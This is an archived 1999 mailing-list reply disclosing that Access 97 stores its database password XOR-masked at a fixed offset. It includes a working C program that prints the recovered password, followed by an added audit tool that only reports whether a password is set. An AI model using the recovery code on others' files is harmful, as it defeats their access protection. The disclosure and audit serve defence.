Re: Microsoft Access 97 Stores Database Password as Plaintext

From: Jim Paris (jimat_private)
Date: Tue Feb 09 1999 - 14:46:27 PST


    > The following text was posted to USENET, and indexed on a Russian cypherpunk
    > site.  I found it when I was doing some work with Access 97 databases.  I
    > think you will agree that this particular "feature" makes the linked
    > database password issue moot.
    
    Most definitely!
    
    > >   Anyway, Access97 passwords are stored in the 13 bytes from offset
    > >0x42 in a .mdb file.  Do a bitwise XOR with 0x86, 0xFB, 0xEC, 0x37,
    > >0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13 to recover the
    > >plaintext.  I think that if the first byte is 0x86, the password is
    > >not checked.
    
    Minor correction: the passwords can be a maximum of 14 bytes.  The last
    XOR value is 0xD8.  Here's a quick program to test this lack of
    security:
    
    /* snip here */
    
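    #include <stdio.h>
    #include <stdlib.h>
    
    int main(int argc, char *argv[])
    {
    	FILE *mdb; int i;
    	int ch;		/* int, not char, so EOF from fgetc() is detectable */
    	/* XOR mask for the 14 password bytes */
    	int secret[14]={
    		0x86,0xFB,0xEC,0x37,
    		0x5D,0x44,0x9C,0xFA,
    		0xC6,0x5E,0x28,0xE6,
    		0x13,0xD8
    	};
    
    	if(argc<2) {
    		fprintf(stderr,"usage: %s filename.mdb\n",argv[0]);
    		return 1;
    	}
    
    	if((mdb=fopen(argv[1],"rb"))==NULL) {
    		fprintf(stderr,"%s: can't open %s\n",argv[0],argv[1]);
    		return 1;
    	}
    
    	/* the password field starts at offset 0x42 */
    	if(fseek(mdb,0x42,SEEK_SET)!=0) {
    		fprintf(stderr,"%s: can't seek in %s\n",argv[0],argv[1]);
    		fclose(mdb);
    		return 1;
    	}
    	
    	printf("The password is: ");
    	for(i=0;i<14;i++)
    	{
    		/* stop at end of file or at the terminating zero byte */
    		if((ch=fgetc(mdb))==EOF) break;
    		if((ch^=secret[i])==0) break;
    		putchar(ch);
    	}
    	if(i==0) printf("(none)");
    	putchar('\n');
    
    	fclose(mdb);
    	return 0;
    }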
    
    /* snip here */
    
    -jim
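
For inventory purposes, the same header field can be checked without revealing anything: the sketch below is an added example, not part of the original message, and only reports whether an Access 97 file relies on the XOR-masked database password and how long it is. The function names `mdb_password_len` and `audit_file` are hypothetical, and the inputs are assumed to be Access 97 `.mdb` files laid out as the message describes.

```c
#include <stdio.h>
#include <string.h>

#define PW_OFFSET 0x42  /* field offset given in the message */
#define PW_MAX    14    /* maximum length per the correction */

/* XOR mask: the 13 quoted bytes plus the corrected final 0xD8. */
static const unsigned char MASK[PW_MAX] = {
    0x86,0xFB,0xEC,0x37,0x5D,0x44,0x9C,0xFA,
    0xC6,0x5E,0x28,0xE6,0x13,0xD8
};

/* Length of the stored password (0 = none), or -1 if the buffer is too
   short to contain the field. The plaintext is never returned or printed. */
int mdb_password_len(const unsigned char *hdr, size_t n)
{
    size_t i;
    if (n < (size_t)(PW_OFFSET + PW_MAX)) return -1;
    for (i = 0; i < PW_MAX; i++)
        if ((hdr[PW_OFFSET + i] ^ MASK[i]) == 0) break;
    return (int)i;
}

/* Audit one file: -2 if it cannot be opened, else as mdb_password_len(). */
int audit_file(const char *path)
{
    unsigned char hdr[PW_OFFSET + PW_MAX];
    size_t n;
    FILE *f = fopen(path, "rb");
    if (!f) return -2;
    n = fread(hdr, 1, sizeof hdr, f);
    fclose(f);
    return mdb_password_len(hdr, n);
}

int main(int argc, char *argv[])
{
    int i, worst = 0;
    for (i = 1; i < argc; i++) {
        int len = audit_file(argv[i]);
        if (len < 0)
            fprintf(stderr, "%s: unreadable or shorter than header\n", argv[i]);
        else if (len > 0)
            printf("%s: database password set (%d bytes, XOR-masked only)\n", argv[i], len);
        else printf("%s: no database password\n", argv[i]);
        if (len > 0 && worst == 0) worst = 1;
    }
    return worst;   /* non-zero: some file relies on the header password */
}
```

A non-zero exit status marks files whose only protection is this header field, so they can be moved behind file-system permissions or real encryption.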
    


